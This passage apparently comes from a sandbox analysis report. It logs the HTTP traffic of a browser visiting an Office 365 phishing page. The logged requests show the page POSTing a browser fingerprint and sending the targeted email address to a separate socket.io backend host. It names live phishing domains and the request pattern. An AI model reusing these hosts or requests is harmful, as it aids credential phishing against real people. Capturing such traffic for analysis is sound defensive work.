                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:59 UTC849INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:59 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Ul1gTbjab%2B7RNCAvhaCwi3V5P%2BFPame4FgB6IMSsvmYjhVV1Qzkm51DeVFlXvw%2BZvR42LvFs%2BkDHQRjR21uvcSuxYI29pTUNIHXVJnw4QhULMiAKekMYhYBbITXq6%2FBWH2aRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ef159c1188d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83928&min_rtt=83220&rtt_var=18622&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1264&delivery_rate=35801&cwnd=252&unsent_bytes=0&cid=1309a01ec5184af6&ts=806&x=0"
                                                        2025-03-27 13:41:59 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        76192.168.2.549829172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:58 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrelM&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:59 UTC805INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:59 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3CQZQpqtFjq%2FQSQc1ETvzb4jXh4DwGO4Gk2eVsL7ZibsjTTbD%2BedhHdaEdMpAZ4SvdVk%2Fytz%2Bp%2BWeYJ%2FhzR882B29PFS38CEvd1B2Bb3j6Wvysee3WRHewSjholB8saU%2FsbZYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ef46bcb4271-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83953&min_rtt=83680&rtt_var=17911&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1022&delivery_rate=36512&cwnd=252&unsent_bytes=0&cid=9cb82cb0d11c16da&ts=312&x=0"
                                                        2025-03-27 13:41:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        77192.168.2.549819104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:59 UTC1021OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:59 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:41:59 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:41:59 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:41:59 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:41:59 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:41:59 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:41:59 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:41:59 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:41:59 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        78192.168.2.549831172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:59 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrelO&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:59 UTC833INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:59 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7RftjsrCTblj3zA%2FLQD5W9R2tQzMB6qcGrnL4kYOK4tFmo3sae5zPQ0liazNB8X2gTFnQVYKLWctIkPgkAmr9n%2BS2iflOs5eRESaFaf6hZ36hh2YiL%2BBru%2FF6QKUVCDWR%2B6Sfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ef7cfa5fd86-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=85364&min_rtt=85294&rtt_var=18048&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=35826&cwnd=252&unsent_bytes=0&cid=a5bd68efc32b813c&ts=262&x=0"
                                                        2025-03-27 13:41:59 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:41:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        79192.168.2.549832172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:00 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrfLw HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:00 UTC941INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:00 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbTMaGRKZejSlHtYE7Va9oRlVrO9JGDhunFzM5h6JEeXN2f55LqekGtLy%2FELotkcqu5NcBg0Zcrp1qxriBAxePndAcPEwh6buuRCm7nXvG%2Ba%2F5JZrXJQ2qzeUFKGW60KvGtMtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4efdbf151526-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84542&min_rtt=84524&rtt_var=17860&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1139&delivery_rate=36136&cwnd=252&unsent_bytes=0&cid=5e38b7ce404398f2&ts=309&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        80192.168.2.549833172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:00 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrfLw HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:01 UTC849INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:01 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uddaBwTAch3EOtNm3uaxrymAzRW%2FcJUAHfnG5z8KVKW6FXHcAP1E%2Fnleev4Pwb7WDdV6ERjnJuC5XM%2F5gxFQU2zMNKqOOl8XdyI4%2BeK6i4DoaYwCcHpHZyBZezm59cH5qiUnZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f00bd760f3e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84799&min_rtt=83781&rtt_var=18702&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1239&delivery_rate=36452&cwnd=251&unsent_bytes=0&cid=13493c5669d67168&ts=310&x=0"
                                                        2025-03-27 13:42:01 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 46 30 59 77 68 4e 71 75 73 64 4b 45 61 63 79 53 41 41 66 49 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"F0YwhNqusdKEacySAAfI","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        81192.168.2.549837172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:01 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=F0YwhNqusdKEacySAAfI HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: JXZ1SmqkVejfaQvm9RzfwA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:42:01 UTC835INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:01 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqnD4RmI1xWVcD7h835rFoDTd%2BNMb9pPbHmJt%2Fv7Bgn%2BVEwkgI3NaENu24hv03VqdBkN8AsSlTmP3PER8GyZkGz5qMslhvtTk7ydA%2BgqnexUn5%2BuoSZg0o7OoSvV9B%2BHY1Vy5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f03d98fc52b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83748&min_rtt=83732&rtt_var=17691&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1121&delivery_rate=36478&cwnd=252&unsent_bytes=0&cid=9282830558043506&ts=301&x=0"
                                                        2025-03-27 13:42:01 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:42:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        82192.168.2.549835172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
